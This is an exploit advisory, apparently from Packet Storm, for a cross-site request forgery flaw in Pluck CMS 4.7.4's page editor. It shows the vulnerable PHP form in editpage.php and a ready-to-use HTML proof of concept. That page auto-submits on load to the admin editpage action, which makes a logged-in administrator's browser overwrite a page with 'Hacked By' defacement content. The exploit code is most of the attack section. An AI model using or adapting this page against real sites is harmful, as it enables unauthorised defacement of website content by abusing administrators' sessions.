Pluck CMS 4.7.4 Cross Site Request Forgery

Pluck CMS version 4.7.4 suffers from a cross site request forgery vulnerability.

MD5 | f0fe9f58ada019c0bc6f3621d00c2e1f

Download

==============================================
# Exploit Title : pluck-cms vulnerability CSRF
# Reported Date : 8 - 10 - 2017
# Exploit Author : Ashiyane Digital Security Team
# CWE: CSRF - 352
# Tested On :  kali Linux
# Vendor Homepage :  https://www.pluck-cms.org/
# Software Link :  https://github.com/pluck-cms/pluck/releases
# Version : 4.7.4
==============================================

-----------------------------
vulnerability discovered by :

Ehsan Cod3r , Und3rgr0und

-----------------------------
vulnerability Path :

http://127.0.0.1/PluckCMS/data/inc/editpage.php
-----------------------------

vulnerability File:

editpage.php
-----------------------------

vulnerability Method :

_GET[]
-----------------------------

Vulnerability code :


<form name="page_form" method="post" action="">
<p>
<label class="kop2" for="title"><?php echo $lang['general']['title'];
?></label>
<input name="title" id="title" type="text" value="<?php if
(isset($_GET['page'])) echo $title; ?>" />
</p>
<p><a href="#" class="kop2" onclick="return kadabra('seo-name');"><?php
echo $lang['page']['seo_urls']; ?></a></p>
<div id="seo-name" style="display: none;">
<input name="seo_name" id="seo_name" type="text" value="<?php if
(isset($_GET['page'])) if (isset($seoname)) echo $seoname; else echo
$title; ?>" />
</div>

<label class="kop2" for="content-form"><?php echo
$lang['general']['contents']; ?></label>
<textarea class="<?php if (defined('WYSIWYG_TEXTAREA_CLASS')) echo
WYSIWYG_TEXTAREA_CLASS; ?>" name="content" id="content-form" cols="70"
rows="20"><?php if (isset($_GET['page'])) echo htmlspecialchars($content);
?></textarea>


<div class="menudiv" style="width: 588px; margin-<?php if (DIRECTION_RTL)
echo 'right'; else echo 'left'; ?>: 0;">
<p><a href="#" class="kop2" onclick="return kadabra('meta-options');"><?php
echo $lang['editmeta']['title']; ?></a></p>
<p class="kop4" style="margin-bottom: 5px;"><?php echo
$lang['editmeta']['descr']; ?></p>

<div id="meta-options" style="display: none;">
    <label for="description"><?php echo $lang['general']['description'];
?></label>
    <br />
    <textarea id="description" name="description" rows="2" cols="40"
class="white"><?php if (isset($description)) echo $description;
?></textarea>
    <br />

    <label for="keywords"><?php echo $lang['editmeta']['keywords'];
?></label>
    <br />
    <span class="kop4"><?php echo $lang['editmeta']['comma']; ?></span>
    <br />
    <textarea id="keywords" name="keywords" rows="1" cols="40"
class="white"><?php if (isset($keywords)) echo $keywords; ?></textarea>
</div>
</div>

<div class="menudiv" style="width: 588px; margin-<?php if (DIRECTION_RTL)
echo 'right'; else echo 'left'; ?>: 0;">
<p><a href="#" class="kop2" onclick="return
kadabra('other-options');"><?php echo $lang['general']['other_options'];
?></a></p>
<p class="kop4" style="margin-bottom: 5px;"><?php echo
$lang['page']['options']; ?></p>

<div id="other-options" style="display: block;">
    <table>
    <tr>
        <td><label for="hidden"><?php echo $lang['page']['in_menu'];
?></label><br /></td>
        <td><input type="checkbox" name="hidden" id="hidden" <?php if
(!isset($_GET['page']) || $hidden == 'no') echo'checked="checked"'; ?>
value="no" /></td>
    </tr>

    <tr>
        <td><label for="sub_page"><?php echo $lang['page']['sub_page'];
?></label></td>
        <td> <?php if (isset($_GET['page']))
show_subpage_select('sub_page', $_GET['page']); else
show_subpage_select('sub_page'); ?></td>
    </tr>

    <?php run_hook('admin_save_page_beforepost'); ?>
    </table>
</div>
</div>
<?php show_common_submits('?action=page', true); ?>
</form>

============================================================================

Exploit code :

<html>
<body onload="document.exploit.submit()">
<form name="exploit" method="post" action="
http://localhost/1/PluckCMS/admin.php?action=editpage">
<input type="hidden" name="title" value="Hacked By Ehsan Cod3r">
<input type="hidden" name="seo_name" value="">
<input type="hidden" name="content" value="<h1>Hacked By Ehsan Cod3r">
<input type="hidden" name="description" value="">
<input type="hidden" name="keywords" value="">
<input type="hidden" name="hidden" value="no">
<input type="hidden" name="sub_page" value="">
<input type="hidden" name="theme" value="default">
<input type="hidden" name="save_exit" value="Save+and+Exit">
</form>
</body>
</html>

Source: packetstormsecurity.com